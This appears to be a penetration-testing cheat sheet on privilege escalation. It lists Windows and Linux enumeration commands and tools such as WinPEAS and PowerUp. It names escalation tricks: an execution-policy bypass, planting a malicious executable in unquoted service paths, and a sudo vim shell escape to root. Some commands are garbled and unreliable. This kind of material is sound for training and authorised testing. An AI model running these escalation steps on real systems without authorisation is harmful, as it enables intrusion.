Privilege Escalation [PrevEsc]
Privilege Escalation
Manual Enumeration
Users
Windows:
Identify the current user:
whoami net user
Linux:
Identify the current user and user details:
whoami id
Hostname
Windows:
Obtain system and hostname information:
systeminfo hostname
Linux:
Obtain system and hostname information:
uname -a hostname cat /etc/issue
Running Processes and Services
Windows:
List running processes and associated services:
tasklist /svc
Linux:
List all running processes:
ps aux
Network Information
Windows:
Obtain network information:
ipconfig /all route print netstat -ano
Linux:
Obtain network information:
ip a | sudo ifconfig ssh -anp
Firewall
Windows:
Check Windows firewall settings:
netsh advfirewall show currentprofile netsh advfirewall firewall show rule name=all
Linux:
Check iptables rules:
iptables -L
Scheduled Tasks
Windows:
List scheduled tasks:
schtasks /query /fo LIST /v
Linux:
List scheduled tasks:
ls -lah /etc/cron*
Applications and Patch Levels
Windows:
List installed applications and patches:
wmic product get name, version, vendor wmic qfe get Caption, Description, HotFixID, InstalledOn
Linux:
List installed packages:
dpkg -l
Readable/Writable Files
Windows:
Check permissions of files and directories:
accesschk.exe -uws "Everyone" "C:/Program Files"
Linux:
Find writable directories:
find / -writable -type d 2>/dev/null
Unmounted Disks
Windows:
List unmounted disks:
mountvol
Linux:
List unmounted disks:
mount
Drivers and Kernel Modules
Windows:
List installed drivers:
driverquery.exe
Linux:
List loaded kernel modules:
lsmod modinfo <MODULE_NAME>
Binaries that Auto Elevate
Identify binaries that auto elevate privileges.
Automated Enumeration
Tools
Use various tools for automated privilege escalation enumeration:
Windows:
windows-privesc-checker
Watson
Sherlock
PowerUp
Windows-Exploit-Suggester
JAWS
WinPEAS.exe and .bat
Linux:
linPEAS
LinEnum
Windows PrivEsc
Insecure File Permissions
Using PowerShell:
Set execution policy and use PowerUp tool:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass Import-Module .\PowerUp.ps1 Invoke-AllChecks
Check file permissions:
icacls.exe "<FILE_PATH>"
Unquoted Service Paths
Create a malicious .exe file in one of the unquoted paths.
Linux PrivEsc
Understanding Permissions in Linux
Learn about file and directory permissions in Linux.
sudo -l
Check sudo privileges:
sudo -l
sudo vim -c ':!/bin/bash'
Escalate privileges using Vim:
sudo vim -c ':!/bin/bash'
Last updated
Was this helpful?